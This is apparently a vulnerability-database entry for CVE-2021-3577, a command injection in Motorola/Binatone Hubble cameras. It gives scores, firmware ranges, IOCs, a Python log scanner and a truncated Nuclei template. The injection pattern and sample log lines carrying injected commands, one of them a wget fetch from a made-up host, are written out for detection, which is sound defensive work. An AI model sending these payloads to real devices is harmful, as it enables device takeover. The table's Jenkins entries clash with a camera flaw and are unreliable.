CVE-2021-3577
Published 2021-11-12
Priority: P1 84 · high · CVSS 3.1: 8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW · Exploit · VulnCheck KEV · Exploited in the wild
EPSS: 59.89% (99.0th percentile)
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected (9 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| binatoneglobal | comfort_85_connect_firmware | < 03.40.02 | 03.40.02 |
| binatoneglobal | focus_72r_firmware | < 03.40.00 | 03.40.00 |
| binatoneglobal | halo_+_camera_firmware | < 03.50.14 | 03.50.14 |
| binatoneglobal | mbp3855_firmware | < 03.40.00 | 03.40.00 |
| jenkins | git_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| motorola | binatone_hubble_cameras | — | — |
Detection & IOCs (extracted from sources)
- Look for HTTP GET requests to the camera web interface whose query string matches `?action=command&command=set_city_timezone&value=$(<cmd>)`; the `value` parameter of the `set_city_timezone` command is the OS command injection point for CVE-2021-3577.
- Confirm exploitation via an out-of-band HTTP callback (OAST/interactsh): a successful injection causes the device to issue an outbound HTTP request to an attacker-controlled host.
- A response body containing `set_city_timezone` together with HTTP 200 shows only that the vulnerable endpoint is reachable and accepted the injected parameter; the out-of-band callback, not the 200, is the evidence that the command actually ran.
- No authentication is required (PR:N) and the CVSS vector is Adjacent Network (AV:A). Monitor for unauthenticated requests to `/?action=command` on the HTTP port of Motorola/Binatone Hubble cameras.
- The Nuclei template uses `{{interactsh-url}}` as a placeholder for the out-of-band callback server; replace it with a real OAST/interactsh endpoint when operationalizing the detection or the exploit proof of concept.
- The VulnCheck record lists only Halo+ camera firmware (cpe:2.3:o:binatoneglobal:halo\+_camera_firmware), while the NVD ranges above also cover Comfort 85 Connect, Focus 72R and MBP3855 firmware; scope detections to the Hubble camera family rather than to a single model so that hits on the other affected units are not discarded as false positives.
- AV:A means the vendor's model assumes the attacker is on the same network as the camera, so internal/LAN traffic monitoring is the primary control. The Shadowserver honeypot references below show the same request pattern being sprayed across the internet, so any camera interface that is reachable from the internet should be monitored as well.
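The request pattern and the 200-versus-callback distinction above, turned into a log scanner (an added example, not code from the page, the vendor or the Nuclei project). It assumes combined-format HTTP access logs captured in front of the camera interface (a reverse proxy, tap or IDS export); the log lines in `SAMPLE_LOG` and the host 10.0.0.99 are constructed for the demo, not captured traffic. It percent-decodes the `value` parameter before looking for shell metacharacters, so encoded `$(` (`%24%28`) is caught, and it pulls any URL out of the injected command as a callback IOC.

```python
"""Flag CVE-2021-3577 exploitation attempts in HTTP access logs.

Added example, not code from the page, the vendor or the Nuclei project.
Assumes combined-format access logs in front of the camera's HTTP
interface; the lines in SAMPLE_LOG are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# A decoded `value` containing any of these turns the timezone setter into a
# shell command (the page's PoC uses the `$(...)` form).
SHELL_INJECTION = re.compile(r"\$\(|\$\{|`|;|\||&|\n")

# Any URL inside the injected command is the attacker's callback/stager host.
CALLBACK_URL = re.compile(r"https?://[^\s'\")]+")

# Minimal combined-log parser: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: two injection attempts (one with a stager URL, one with
# backticks), a plain timezone update from the companion app, an unrelated
# command and an unrelated 404. The 10.0.0.99 callback host is made up.
SAMPLE_LOG = """\
10.0.0.23 - - [22/Jan/2024:10:01:02 +0000] "GET /?action=command&command=set_city_timezone&value=%24%28wget%20http%3A%2F%2F10.0.0.99%2Fx%29 HTTP/1.1" 200 152 "-" "Mozilla/5.0"
10.0.0.23 - - [22/Jan/2024:10:01:03 +0000] "GET /?action=command&command=set_city_timezone&value=%60id%60 HTTP/1.1" 200 152 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Jan/2024:10:02:00 +0000] "GET /?action=command&command=set_city_timezone&value=Europe/London HTTP/1.1" 200 152 "-" "HubbleApp/3.40"
10.0.0.5 - - [22/Jan/2024:10:02:10 +0000] "GET /?action=command&command=get_version HTTP/1.1" 200 44 "-" "HubbleApp/3.40"
10.0.0.77 - - [22/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 404 0 "-" "curl/8.0"
"""


def classify_request(target):
    """Return (verdict, decoded value) for one request target.

    verdict is 'exploit' when the set_city_timezone value carries shell
    metacharacters, 'endpoint-hit' when the vulnerable endpoint was called
    with a plain value, and None for any other request.
    """
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("action") != ["command"] or qs.get("command") != ["set_city_timezone"]:
        return None, None
    value = qs.get("value", [""])[0]  # parse_qs percent-decodes for us
    verdict = "exploit" if SHELL_INJECTION.search(value) else "endpoint-hit"
    return verdict, value


def scan_log(text):
    """Parse access-log lines and return one finding per hit on the endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, value = classify_request(m["target"])
        if verdict is None:
            continue
        findings.append({
            "client": m["client"],
            "ts": m["ts"],
            "verdict": verdict,
            # A 200 only shows the endpoint accepted the request; execution is
            # confirmed by the out-of-band callback, not by the status code.
            "status": int(m["status"]),
            "value": value,
            "callbacks": CALLBACK_URL.findall(value),  # IOCs to block and hunt
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['verdict']:12} "
              f"value={f['value']!r} callbacks={f['callbacks']}")
```

Run it against a real export by replacing `SAMPLE_LOG` with the file contents; `endpoint-hit` findings from a source other than the companion app are still worth a look, because the endpoint is reachable without authentication, while `exploit` findings should be correlated with outbound connections from the camera to the extracted callback hosts.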
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 5.8 | MEDIUM | AV:A/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 8.8 | HIGH | — |
GHSA
GHSA-794m-w426-mg5p · ghsa_unreviewed · 2022-05-24 · CVE-2021-3577 [HIGH] · CWE-863
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
VulnCheck
CVE-2021-3577 [HIGH] · vulncheck · 2021 · CVSS 8.8
binatoneglobal halo\+_camera_firmware: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected: binatoneglobal halo\+_camera_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-3577; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vu
No detection rules found.
Nuclei
Motorola Baby Monitors - Remote Command Execution · nuclei · CVSS 8.8 · CVE-2021-3577 [HIGH]
Motorola Baby Monitors contain multiple interface vulnerabilities that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
```yaml
id: CVE-2021-3577

info:
  name: Motorola Baby Monitors - Remote Command Execution
  author: gy741
  severity: high
  description: Motorola Baby Monitors contain multiple interface vulnerabilities that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
  remediation: |
    Apply the l
```